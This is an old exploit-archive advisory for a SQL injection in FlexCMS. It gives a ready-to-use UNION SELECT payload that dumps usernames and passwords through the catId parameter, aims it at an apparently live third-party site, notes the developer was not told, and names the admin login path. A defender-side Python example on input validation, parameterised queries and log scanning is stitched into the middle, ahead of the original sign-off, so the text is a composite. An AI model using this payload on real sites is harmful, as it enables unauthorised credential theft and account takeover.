FlexCMS SQL Injection

2009-02-09T00:00:00
ID PACKETSTORM:74796
Type packetstorm
Reporter MisterRichard
Modified 2009-02-09T00:00:00

Description

AUTHOR: MisterRichard  
  
FlexCMS Remote SQL Injection  
  
Discovered by MisterRichard.  
  
Developer site: http://www.flexcms.dk/  
  
Developer has not been notified.  
  
Live demo:  
  
Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--  
  
http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--  
  
Admin login site:  
  
http://target.com/flexadmin/  
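The payload above is a classic UNION-based injection through an integer parameter (`catId`): the attacker appends `union all select ...` so that the application's own result set carries rows from another table. The example below is added here and is not FlexCMS code; it shows, from the defender's side, the two controls that close this class of bug and the detection logic for spotting the attempt in web server logs. The table names (`categories`, `users`) and the access-log lines are constructed for the example; the `catId` handling and the SQLite schema are assumptions, not the application's real code.

```python
"""Defender-side handling of a UNION injection via an integer query parameter.

Added example (not FlexCMS code). Three parts:
1. validate_cat_id(): reject anything that is not a plain integer before SQL is involved.
2. lookup_category(): bind the value as a parameter instead of concatenating it.
3. scan_access_log(): flag requests whose URL-decoded query string carries a UNION SELECT.
"""
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines in Apache combined style; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Feb/2009:10:00:01 +0100] "GET /flx/webshop/?catId=145 HTTP/1.1" 200 5123
203.0.113.5 - - [09/Feb/2009:10:00:07 +0100] "GET /flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users-- HTTP/1.1" 200 6001
198.51.100.9 - - [09/Feb/2009:10:01:12 +0100] "GET /flx/webshop/?catId=12&page=2 HTTP/1.1" 200 4410
198.51.100.9 - - [09/Feb/2009:10:01:40 +0100] "GET /flx/webshop/?catId=12'%20UNION%20SELECT%20NULL,NULL,NULL,NULL--%20 HTTP/1.1" 500 312
"""

# Minimal parser for the request line fields we need (client IP, URL, HTTP status).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# UNION-based payload: "union", optionally "all"/"distinct", then "select".
UNION_RE = re.compile(r'\bunion\b(\s+(all|distinct))?\s+select\b', re.IGNORECASE)


def validate_cat_id(raw: str) -> int:
    """Accept only a plain non-negative integer of sane length; reject everything else."""
    if not re.fullmatch(r'\d{1,9}', raw):
        raise ValueError(f"invalid catId: {raw!r}")
    return int(raw)


def is_valid_cat_id(raw: str) -> bool:
    """Boolean wrapper around validate_cat_id for callers that prefer not to catch."""
    try:
        validate_cat_id(raw)
        return True
    except ValueError:
        return False


def demo_db() -> sqlite3.Connection:
    """In-memory SQLite database with a hypothetical categories table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO categories VALUES (?, ?)", [(12, "books"), (145, "shoes")])
    return conn


def lookup_category(conn: sqlite3.Connection, raw_cat_id: str):
    """Parameterised query: the value is bound by the driver, never spliced into SQL text."""
    cat_id = validate_cat_id(raw_cat_id)
    return conn.execute("SELECT id, name FROM categories WHERE id = ?", (cat_id,)).fetchone()


def scan_access_log(text: str):
    """Return (ip, status, decoded query) for every request carrying a UNION SELECT payload."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("url")).query
        # Decode both %20 and '+' to spaces so either encoding of the payload is normalised.
        decoded = unquote_plus(query)
        if UNION_RE.search(decoded):
            hits.append((m.group("ip"), int(m.group("status")), decoded))
    return hits


if __name__ == "__main__":
    for ip, status, query in scan_access_log(SAMPLE_LOG):
        print(f"{ip} status={status} query={query}")
```

Two points worth noting: the integer check alone would have stopped the published payload, and the parameterised query protects every call site even when a check is forgotten; the log scan normalises both `%20` and `+` before matching, since the advisory's own URL mixes the two encodings of a space. A 200 response on a request that carries the payload (as in the second constructed line) is the signal to triage first.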
  
Greetz, agonx, kollek, cardingnu  
  
  